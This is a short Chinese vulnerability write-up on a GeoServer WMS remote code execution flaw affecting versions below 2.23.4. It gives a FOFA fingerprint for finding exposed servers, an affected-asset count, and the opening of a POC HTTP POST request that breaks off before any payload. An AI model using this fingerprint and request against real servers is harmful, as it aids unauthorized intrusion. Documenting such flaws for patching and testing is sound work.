简介
GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和操作地理信息系统(GIS)数据。
漏洞描述
GeoServer wms存在远程代码执行漏洞,攻击者可利用该漏洞通过在xml中包含格式错误的查询字符串的精心编制的payload,让远程恶意用户执行任意代码
Fofa语法与漏洞编号
FOFA:icon_hash=”97540678”
影响资产数量:1,355
CNVD漏洞编号:无
影响版本
GeoServer < 2.23.4
漏洞复现
POC
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-